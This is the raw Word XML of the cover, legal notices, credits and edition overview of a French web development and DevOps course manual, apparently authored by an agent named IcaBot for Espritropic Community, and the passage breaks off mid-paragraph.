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0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="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uverture"/>
            <a:graphic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cover.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7560000" cy="10692000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="1821" w:lineRule="exact"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="1152000" cy="1105578"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="logo_noir.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1152000" cy="1105578"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>BIBLIOTHÈQUE TECHNIQUE · ESPRITROPIC COMMUNITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="800" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="920" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="80"/>
        </w:rPr>
        <w:t>Développement web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="920" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="80"/>
        </w:rPr>
        <w:t>&amp; DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="2" w:color="E0A21B"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Manuel complet : HTML5, CSS3, JavaScript, Linux, conteneurs, cloud et fiabilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deux cours autonomes, quatre-vingt-treize chapitres, des centaines d'exercices corrigés, de schémas et de tableaux de synthèse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="1400" w:lineRule="exact"/>
      </w:pP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14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Volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="487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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="268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Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1462"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cours 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Développement web front-end — 45 chapitres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2680"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Débutant à intermédiaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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Cours 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="487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DevOps, cloud et fiabilité — 48 chapitres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="268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Intermédiaire à confirmé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="1200" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IcaBot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
          <w:spacing w:val="60"/>
        </w:rPr>
        <w:t>Agent d'ESPRITROPIC COMMUNITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Édition 2026 · Volume unique · espritropic.rf.gd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Mentions légales et crédits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Éditeur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESPRITROPIC COMMUNITY — YKABAUTH. Site : https://espritropic.rf.gd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Auteur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> IcaBot, agent d'ESPRITROPIC COMMUNITY. Direction éditoriale : YKABAUTH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Collection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bibliothèque technique Espritropic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Édition.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Première édition, 2026. Volume unique, format A4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Texte.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Les deux cours ont été rédigés spécifiquement pour cette édition à partir des ressources documentaires déposées par l'éditeur. La graphie définitive de la signature « IcaBot » reste modifiable par l'éditeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ISBN et dépôt légal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aucun numéro ISBN ni déclaration de dépôt légal n'ont été fournis avec les ressources éditoriales au moment de la fabrication de ce volume. Ces mentions doivent être complétées par l'éditeur avant toute diffusion commerciale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Licence d'utilisation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ce volume est destiné aux lecteurs de la collection Espritropic. Toute reproduction intégrale ou partielle à des fins commerciales est soumise à l'autorisation écrite de l'éditeur. Les extraits courts accompagnés de la mention de source sont autorisés à des fins pédagogiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Crédits documentaires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce volume s'appuie sur deux ressources fournies par l'éditeur, explicitement citées ici.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. Feuille de route DevOps.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Infographie « DevOps Roadmap: Learn to become a DevOps Engineer or SRE », publiée par roadmap.sh, fournie au format PDF et utilisée comme plan du cours 2. Les intitulés de compétences de la feuille de route sont repris ; le texte pédagogique, les exemples, les exercices et les corrigés sont originaux. roadmap.sh est un projet communautaire indépendant, sans lien avec ESPRITROPIC COMMUNITY.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. Référence HTML5 et CSS3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ouvrage « Apprenez à créer votre site web avec HTML5 et CSS3 » de Mathieu Nebra (M@teo21), diffusé par le Site du Zéro / Sup'Internet sous licence Creative Commons, fourni au format PDF et utilisé comme référence de progression et de structuration du cours 1. Aucun passage n'est reproduit : la progression a été reconstruite, augmentée et actualisée (HTML5 vivant, CSS moderne, JavaScript).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. Identité visuelle.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Logo « &lt;R&gt; » d'Espritropic Community, fourni en deux variantes monochromes (noir et blanc) sur fond transparent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. Typographie.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Times New Roman, Arial et Courier New (Microsoft) pour la composition ; polices métriquement compatibles recommandées en cas d'absence : Liberation Serif, Liberation Sans et Liberation Mono.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Marques et avertissements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les noms de produits cités (HTML, CSS, JavaScript, Linux, Docker, Kubernetes, Terraform, Ansible, AWS, Azure, Google Cloud, GitHub, GitLab, etc.) sont des marques ou des noms commerciaux de leurs détenteurs respectifs. Ils sont utilisés ici à des fins d'identification et de description technique, sans affiliation ni parrainage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les commandes, extraits de configuration et procédures ont été rédigés pour être exacts au moment de la rédaction. Les logiciels évoluent : vérifiez toujours la documentation officielle de la version que vous utilisez. Les manipulations système et cloud peuvent entraîner des coûts ou des interruptions de service ; testez en environnement isolé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>À propos de cette édition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ce volume rassemble, dans un seul fichier Word, l'intégralité des cours issus des ressources documentaires de l'éditeur. Il ne s'agit pas d'un recueil d'articles ni d'une compilation de notes : chaque chapitre a été conçu comme une séquence pédagogique complète, avec objectifs, cours, exemples, exercices et corrigés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Deux domaines, un volume</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les documents fournis décrivent deux parcours distincts, qui ne se recouvrent pas. D'un côté, un ouvrage de référence consacré à la création de sites web avec HTML5 et CSS3, qui couvre les fondations du front-end. De l'autre, une feuille de route DevOps qui recense les compétences attendues d'un ingénieur DevOps ou d'un site reliability engineer (SRE).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Réunir ces deux parcours dans un même volume répond à une réalité professionnelle simple : un développeur front-end travaille aujourd'hui avec Git, des pipelines, des environnements conteneurisés et des plateformes cloud. À l'inverse, un ingénieur DevOps doit comprendre le cycle de vie d'une application web, ses contraintes de performance et d'accessibilité. Les deux cours restent néanmoins autonomes : chacun possède son introduction, sa progression, ses exercices et son projet final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Comment le plan a été construit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le plan du cours 1 suit la progression du document de référence (bases de HTML5, mise en forme CSS, mise en page, fonctionnalités évoluées, annexes), en l'actualisant : HTML5 vivant, CSS Grid, Flexbox, unités fluides, container queries, accessibilité, JavaScript moderne, performance, sécurité front-end et déploiement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le plan du cours 2 reprend l'intégralité des quinze domaines de la feuille de route DevOps : langages, systèmes d'exploitation, terminal, gestion de versions, serveurs et réseaux, conteneurs, fournisseurs cloud, serverless, provisionnement, gestion de configuration, CI/CD, secrets, supervision, orchestration, GitOps, service mesh et patrons de conception cloud. Chaque nœud de la feuille de route est traité dans au moins une section d'un chapitre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Public et prérequis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le volume s'adresse à trois publics : les débutants complets qui suivent le cours 1 dans l'ordre ; les développeurs autodidactes qui souhaitent consolider leurs bases et combler leurs angles morts ; les professionnels de l'exploitation et du développement qui veulent relier les deux mondes. Aucun diplôme n'est requis. Une familiarité avec l'ordinateur, les fichiers et un navigateur suffit pour commencer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Ce que ce volume n'est pas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce volume n'est ni une documentation de référence exhaustive des langages, ni un catalogue de recettes. Il privilégie la compréhension durable : chaque notion est expliquée, illustrée, mise en pratique, puis vérifiée. Les API changent ; les principes restent. C'est pourquoi les chapitres insistent sur les modèles mentaux (comment un navigateur rend une page, comment un paquet circule, comment un conteneur isole un processus) autant que sur les commandes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Fabrication du volume</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le volume a été composé avec des styles natifs Word : chaque niveau de titre, chaque légende, chaque bloc de code et chaque tableau utilise un style nommé. La table des matières générale est un champ automatique : elle peut être mise à jour par le lecteur (clic droit sur le sommaire, « Mettre à jour les champs »). La pagination est continue de la couverture à la dernière annexe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
